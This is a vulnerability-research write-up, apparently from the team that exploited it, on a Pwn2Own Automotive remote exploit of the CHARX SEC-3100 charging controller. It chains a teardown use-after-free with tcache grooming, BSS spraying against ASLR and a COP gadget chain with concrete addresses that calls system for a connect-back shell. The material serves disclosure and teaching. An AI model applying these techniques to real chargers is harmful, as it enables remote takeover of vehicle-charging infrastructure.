Our previous post explored some of the bugs we discovered in the CHARX SEC-3100 ControllerAgent service for Pwn2Own Automotive. We’ll now walk through how these bugs were weaponized to produce a fully remote exploit.

We left off with a use-after-free (UAF) primitive. Notably however, the UAF occurs on process teardown (a “one-shot” style bug), and we don’t have any information leaks to easily deal with ASLR (address space layout randomization).

If you want to try exploiting a similar bug on your own, we’ve hosted a challenge with an adapted version of the same bug pattern on our in-browser WarGames platform here.

Traversing a Freed List

To recap, the C++ destructor ordering bug from the first post results in a UAF during object destruction, which occurs within exit handlers during process teardown. We initiate the exit handlers with a null dereference bug (which triggers a signal handler calling exit). A half-destructed object holds a freed std::list, which is then iterated over to find a list node entry with a specific ID.

More specifically, the C++ list contains ClientSession objects, and the intent of the list iteration is to find the session to shut down and clean up. In other words, we are traversing a freed list.

The C++ standard library implements std::list as a linked list, where each node has next / prev pointers followed by the data type inlined:

std::list<T> {
    std::list_node<T>* head;
    std::list_node<T>* tail;
}

std::list_node<T> {
    std::list_node<T>* next;
    std::list_node<T>* prev;
    T val;
}

In the case of ClientSession, the nodes look like this, having size 0x60:
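
Sketched in the same notation (the member offsets within ClientSession, and the ClientConnection type name, are illustrative; only the fields the traversal below relies on are shown):

std::list_node<ClientSession> {                  // 0x60 bytes total on this 32-bit target
    std::list_node<ClientSession>* next;         // +0x00
    std::list_node<ClientSession>* prev;         // +0x04
    ClientSession val;                           // +0x08, 0x58 bytes; contains, among others:
                                                 //   ClientConnection* m_clientConnection
                                                 //     (virtual get_connection_id())
                                                 //   bool m_isConnectionAssigned
}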

The list destructor iterates over each node, starting at the head, and calls delete on each one. However, for the list “root” itself, it leaves the head / tail pointers alone (i.e. pointing at free memory). Clearing them would be unnecessary, as a destructed list is invalid anyway.

After the list is destructed, the ClientConnectionManagerTcp destructor ends up notifying the ControllerAgent to invalidate a connection ID. The invalidation function iterates over the (now-destructed) list, looking for the session with matching connection ID.

The pseudocode for the list traversal looks something like this:

void ControllerAgent::on_client_removed() {
    // client_sessions list already destructed! cur pointing at now-freed first list node
    std::list_node<ClientSession>* cur = this->client_sessions.head;

    while (cur != &this->client_sessions) {
        if (cur->val.m_isConnectionAssigned
                && cur->val.m_clientConnection->vtable->get_connection_id() == <expected ID>) {
            // unassign the connection ...
            break;
        }
        cur = cur->next;
    }
}


Assuming we can control a node along this traversal, we can easily hijack control flow with the virtual call to get_connection_id.
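
To see why, recall what a virtual call compiles down to: two dependent loads and an indirect branch, with the object pointer passed as the implicit first argument (r0 on ARM). In pseudocode (the slot index is whatever get_connection_id occupies in the real vtable):

// What the hijacked virtual call boils down to. conn is the pointer we planted
// in the fake node's m_clientConnection, so both loads read attacker-controlled memory.
unsigned virtual_get_connection_id(void* conn, unsigned slot) {
    void** vtable = *(void***)conn;               // first load: the (fake) vtable pointer
    auto fn = (unsigned (*)(void*))vtable[slot];  // second load: the get_connection_id entry
    return fn(conn);                              // indirect call; conn arrives in r0
}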

Controlling a List Node

To understand how we can control a node, consider the now-freed head of the list, at which the list traversal starts. When this node is freed during the list destructor, the chunk will have a size class of 0x68, and will be placed into the tcache bin of that size. Fully understanding glibc tcache internals isn’t necessary here; it suffices to say that a tcache bin is just a singly-linked list of free chunks of the same size, where the next pointer is placed at offset 0 in the free chunk.

So when the head node is freed, the allocator will essentially do

p->next = tcache_bin->head;
tcache_bin->head = p;

Conveniently, the tcache’s next pointer sits at the same location as the std::list_node’s next pointer. This pointer gets overwritten with whatever is currently at the head of the tcache bin, while the rest of the chunk is left untouched (technically a tcache “key” is also written into the second pointer slot, overlapping the prev pointer, which we don’t care about).

To sum up, when triggering the UAF list traversal above, the first node will be the mostly-untouched now-freed head of the list, while the remaining iterations will be traversing the tcache bin.
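
In other words, a chunk sitting in a tcache bin doubles as a perfectly walkable list node. Sketching the overlap (offsets for this 32-bit target):

// How the UAF traversal sees a chunk that glibc has placed in the tcache.
freed_chunk {
    void* tcache_next;   // +0x00  overlays std::list_node::next -> the next "node" visited
    void* tcache_key;    // +0x04  overlays std::list_node::prev -> never read by the traversal
    // +0x08 onward: the former ClientSession bytes, left untouched by the free
}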

It now becomes clear that controlling a list node comes down to two things:

  • ensuring the head list node is not “assigned” so the list traversal continues to the 2nd “node” (really a tcache chunk)
  • placing something in the tcache prior to the std::list<ClientSession> destructor, so we control the 2nd “node”

The first point is purely logistical: we connect two clients, disconnect the first to unassign its session, and finally use the null deref to trigger the exit-handler UAF.

Populating the Tcache

We’ve mentioned briefly that there’s a configAccess operation supported by the JSON TCP messaging. This operation provides read/write access to a small set of configuration variables.

Internally, the variables are managed by a ConfigurationManager (a sub-struct of the monolithic ControllerAgent), and are stored as pairs of std::string. Setting these string variables provides a very convenient allocation primitive, and the strings will be freed during the ConfigurationManager destructor, which occurs prior to the list destructor.

The only obstacle to overcome is that normally, the configuration strings can’t contain null bytes… A useful trick for dealing with this is realizing that assigning new values to a std::string does not necessarily cause a reallocation.

The standard library implementation will only allocate a new backing store if the current one is too small. Otherwise, the new string will simply get copied into the existing allocation, with a null byte tacked on the end.

For example, with an existing string of AAAA, assigning a new string BB will result in the same allocation being reused, now containing BB\0A.
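
A quick local demonstration of the trick (implementation-dependent behavior, observed with libstdc++; the real exploit performs the same sequence of assignments remotely via configAccess, against a 0x60-byte string so the data sits in a heap chunk rather than the SSO buffer):

#include <cassert>
#include <cstring>
#include <string>
#include <vector>

// Embed null bytes into a std::string's existing allocation by assigning
// progressively shorter prefixes: each assignment of length k rewrites bytes
// [0, k) and places a terminating '\0' at offset k, leaving everything past
// k untouched in the same buffer.
int main() {
    // Bytes we want resident in the allocation, nulls included (kept > 15
    // characters so the string is heap-allocated rather than SSO).
    std::vector<unsigned char> payload = {
        'A', 'A', '\0', '\0', 'B', 'B', '\0', 'C',
        'D', 'D', 'D', 'D', '\0', '\0', 'E', 'E',
        'F', 'F', 'F', 'F', 'F', 'F', '\0', 'G',
    };

    std::string s;
    for (size_t k = payload.size(); k > 0; --k) {
        // Besides the initial full-length write, only lengths where a '\0'
        // must land matter.
        if (k != payload.size() && payload[k] != '\0')
            continue;
        std::string chunk;
        for (size_t i = 0; i < k; ++i)
            chunk += payload[i] ? char(payload[i]) : 'X';  // placeholder, fixed by a later pass
        s = chunk;  // reuses the existing backing store; no reallocation
    }

    // Peek past size() into the reused buffer: the payload is all there.
    assert(std::memcmp(s.data(), payload.data(), payload.size()) == 0);
}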

So far, the general plan of attack is:

  • Set a config value to a string of size 0x60
  • Repeatedly assign smaller strings to embed nulls and construct a fake std::list_node<ClientSession>
  • Trigger null deref => exit handlers / destructors
  • Config string with fake node is freed, placed in tcache
  • The list of sessions is destructed, first node freed into tcache
    • The next pointer becomes whatever was in the tcache, i.e. the fake node
  • UAF list traversal goes to 2nd fake node (the freed config string)
  • Hijacked virtual call from fake node’s m_clientConnection
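
Tying the second and last bullets together, the fake node embedded in the config string only needs two meaningful fields (a sketch; GUESSED_BSS_ADDR is a placeholder for the page-offset guess discussed below, and the node layout is the one sketched earlier):

// Contents of the 0x60-byte config string, viewed as the list node the UAF
// traversal will walk into.
std::list_node<ClientSession> fake_node = {};
fake_node.val.m_isConnectionAssigned = true;     // take the virtual-call branch
fake_node.val.m_clientConnection =
    (ClientConnection*)GUESSED_BSS_ADDR;         // placeholder: guessed fake-object address
// next / prev don't matter: freeing the config string lets the tcache clobber
// them with its own next pointer and key before the traversal ever runs.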

This leaves one crucial question unanswered: with ASLR, we don’t know where to point the fake m_clientConnection, where gadgets are, etc. There are plenty of large buffers in the BSS (e.g. TCP input) in which to place our fake object, if only we knew where they were in memory.

Without any information leaks on hand, we’ll need to get creative…

ASLR Entropy

As we saw when discovering the UAF, a system monitor / watchdog restarts the controller agent if it exits, so a brute-force approach of guessing the ASLR slide, crashing, and restarting seems like a viable option. The CHARX SEC-3100 runs 32-bit ARM Linux, which only has 8 bits of ASLR randomization by default.

That’s only 256 possible slides, which is relatively brute-forceable.

One caveat is that each iteration could take upwards of 6 seconds, and with 256 slides we expect 256 attempts on average, putting the expected runtime until successful exploitation over 25 minutes… a bit too long for comfort. Instead of naively brute-forcing ASLR, we can do much better.

ASLR “Bypass”: BSS Spraying

A noticeable feature of the controller agent binary was how massive its BSS segment was, roughly 0x1b3000 bytes, or 435 pages. This invited the idea that we could place multiple fake objects in various pages at the same page offset, such that if any of the payloads ended up at the correct address, the exploit would succeed.

To illustrate, imagine we had fake objects at un-slid addresses 0x1040 and 0x2040, and guessed address 0x2040 as the pointer in our fake list node. This guess would work with an ASLR slide of either 0 or 0x1000, which alone doubles the probability of success. With n fake objects, the probability becomes n / 256.

The next logical step is to find some large structure(s) in the BSS that can hold these fake objects.

Closer inspection revealed that over 80% of the BSS belonged to a structure V2GMessageReqMsg, with a size of over 0x167000 bytes. This structure holds the most recently parsed TCP JSON message with operation v2gMessage. So how much of this structure can we control?

Populating the V2G Structure

V2G (vehicle-to-grid) is a protocol related to electric vehicles selling power back to the grid, and the JSON messaging expects keys like salesTariff and consumptionCost. This structure contains several arrays within sub-structures, which in turn contain other arrays. These nested arrays explain the structure’s large size.

Since this structure is intended to be populated from user input (over TCP), many of the fields can be controlled. However, each fake object must use controllable fields all at the same page offset, which introduces significant constraints. The sub-structures are not of an aligned size, so an easily controllable field in one page may be impossible to control in the next page. Similarly, 8 bytes may be controlled in one page, but only 4 in others, etc.

To relax the constraints somewhat, we’ll have fake objects of only 4 bytes. In other words, each fake object is nothing but a vtable pointer. Each of these vtable pointers can then point into unconstrained “raw” buffers for TCP / UDP / HomePlug packet input.

Accommodating these constraints means only being able to use certain fields for our V2G JSON input message. We end up crafting a message looking something like the JSON blob below, where the {"": 0} objects are padding to advance to the next page:

In this way, we were able to populate fake objects in 83 pages, accounting for 83 of the 256 possible ASLR slides. That gives our exploit a probability close to 1 in 3 for bypassing ASLR, a huge improvement over a naive brute force of 1 in 256.

The V2G messaging required some other initialization to take place after program startup, so each brute force iteration takes longer waiting for setup to complete, resulting in ~15 seconds per iteration. That said, the enhanced probability is well worth the per-iteration slowdown.

COP Chain

The increased probability of having our fake object at the guessed address is great, but we’ve also restricted ourselves to a fake object with just a vtable and no additional payload. Our primitive has evolved from a simple UAF into an arbitrary virtual call, but with only 4 controlled bytes at the “this” argument.

To turn this into full code execution, we’ll use a sequence of COP (call-oriented programming) gadgets, to eventually achieve an arbitrary call with an arbitrary argument.

We start with control of r0 and of the 4 bytes it points to (the fake object’s vtable pointer). We jump into the following gadget, where only the commented instructions matter:

0x498148:    mov     r4, r0           @ r4 = r0 (pointer to our fake object)
0x49814a:    ldr     r7, [r0, #0]     @ r7 = the fake object's vtable pointer
0x49814c:    mov     r5, r1
0x49814e:    mov     r6, r2
0x498150:    mov     r1, r3
0x498152:    ldr     r2, [sp, #24]
0x498154:    ldr     r3, [r7, #20]    @ r3 = fake vtable slot at offset 20 (next gadget in the chain)
0x498156:    blx     r3               @ tail-call the next gadget


This gadget essentially does mov r4, r0, then transfers control through another slot of the same fake vtable (the next gadget). That next gadget is:

0x4a32ea:    ldr     r0, [r4, #0]     @ r0 = *r4 (the fake object's 4 bytes, i.e. the old vtable pointer)
0x4a32ec:    ldr     r3, [r0, #0]     @ treat that value as an object: r3 = its "vtable"
0x4a32ee:    ldr     r3, [r3, #8]     @ r3 = vtable slot at offset 8
0x4a32f0:    blx     r3               @ virtual call on the 2nd fake object


This gadget dereferences r4, and treats the value as a C++ object, dispatching a virtual call. In combination with the previous gadget, we’ve essentially done a simple dereference r0 = *r0.

Crucially, this treats the memory that previously served as the fake vtable as a full-blown 2nd fake object. Since this 2nd fake object lives in an unconstrained buffer, we now have an arbitrary virtual call with a fully-controlled “this” argument (containing arbitrary fields).

From here, we trigger the mov r4, r0 gadget once more before jumping into our final gadget, which is part of a function that loops over an array of function pointer / argument pairs. The gadget is a bit longer, but the comments trace the path from r4 control to the function pointer invocation:

0x458d12:    ldrh    r1, [r4, #8]     @ r1 = entry count, read from our fake object
0x458d14:    ldr     r3, [r4, #4]     @ r3 = pointer to an array of 16-byte entries
0x458d16:    ldr     r4, [sp, #0]
0x458d18:    cbnz    r1, 0x458d24
0x458d1a:    b.n     0x458d06
0x458d1c:    subs    r1, #1
0x458d1e:    add.w   r3, r3, #16      @ advance to the next entry
0x458d22:    beq.n   0x458d06
0x458d24:    ldrd    r2, r0, [r3]     @ r2, r0 = entry's first two words
0x458d28:    eors    r2, r4
0x458d2a:    tst     r2, r0           @ match check; a zero second word always passes
0x458d2c:    bne.n   0x458d1c
0x458d2e:    ldr     r2, [r3, #12]    @ r2 = entry's function pointer
0x458d30:    cmp     r2, #0
0x458d32:    beq.n   0x458d06
0x458d34:    ldr     r0, [r3, #8]     @ r0 = entry's argument
0x458d36:    mov     r1, r6
0x458d38:    blx     r2               @ call function(argument)


We end up with an arbitrary call with an arbitrary first argument, which we can simply direct to system (which is already present in the PLT) to spawn a connect-back shell.
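
Put concretely, the offsets in the listing above imply that the 2nd fake object (reached through r4) and its companion table need roughly the following shape (a sketch; the names are ours, not from the binary):

fake_call_entry {                 // one 16-byte entry of the table walked via r3
    uint32_t id;                  // +0x00  xor'd with a stack value...
    uint32_t mask;                // +0x04  ...then and'ed; zero makes the check always pass
    const char* arg;              // +0x08  becomes r0: the connect-back command line
    void* fn;                     // +0x0c  becomes r2, invoked by blx r2: system@plt
}

fake_r4_object {                  // the fully-controlled 2nd fake object
    void* vtable;                 // +0x00  fake vtable used by the earlier gadgets
    fake_call_entry* entries;     // +0x04  loaded by "ldr r3, [r4, #4]"
    uint16_t count;               // +0x08  loaded by "ldrh r1, [r4, #8]" -- at least 1
}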

To sum up the COP chain:

  • “bootstrap” from fake vtable into fully-controlled 2nd fake object, using r0 = *r0 gadget pair
    • mov r4, r0 gadget followed by
    • ldr r0, [r4] gadget
  • call system using gadget accepting function pointer / argument structure
    • mov r4, r0 gives r4 control
    • next gadget fetches function pointer / argument from r4

Constructing Fake Objects

We have a path from the 4-byte fake object to the 2nd fake object to system, but it is worth noting that a separate 2nd fake object must exist for each ASLR slide we account for. Each copy needs its own vtable pointers, gadget addresses, address of the command-line string passed to system, etc…

The 2nd fake objects will be spread out across 3 “raw” buffers:

  • TCP input
  • UDP broadcast input
  • HomePlug packet input

The received UDP input and HomePlug packets are completely raw, but the TCP buffer undergoes some string processing, namely the messages are newline-delimited. This is not fundamentally restrictive, but requires additional iterations to embed null bytes (similar to the std::string behavior), and the payload can’t contain newlines.

With all the payloads in place, we end up with something conceptually like this:

Depending on the ASLR slide, only one (or none) of the fake object pairs will actually be at the right addresses, so only one set of arrows shown would be valid at once.

Putting Everything Together

With a strategy defined, implementing the exploit mostly amounts to wrapping everything in the necessary brute-force logic.

To recap the exploit flow in one place, we perform the following steps in a loop:

  1. Wait for the agent to perform V2G-prerequisite initialization
  2. Use a config value std::string to craft a fake list node
  3. Populate V2GMessageReqMsg in the BSS with many fake objects
    • each is at the same page offset, and only 4 bytes for a vtable
    • each vtable points at a 2nd fake object in a raw buffer
  4. Populate raw BSS buffers with 2nd fake objects (TCP / UDP / HomePlug packets)
  5. Trigger HomePlug null deref to kick off exit handlers (ControllerAgent destructor)
  6. Config value with fake list node is freed into tcache
  7. List destructor frees list nodes
    • head node’s next pointer overwritten with the existing tcache head, i.e. the fake list node
  8. ClientConnectionManagerTcp destructor ends up invoking UAF list traversal
    • UAF list traversal uses guessed fake object pointer in crafted fake list node
  9. Hijacked virtual call on guessed fake object address
    • if ASLR slide was accounted for, address will be valid, otherwise will crash
    • enter COP chain invoking system
  10. Check for connect-back shell, otherwise wait for service to restart and repeat

With the BSS spray technique giving an 83 in 256 probability of success per attempt (an expected 256/83 ≈ 3.1 attempts), and roughly 15 seconds required for each iteration, the average / expected runtime for the exploit is under a minute.

For reference, you can find the full exploit code here.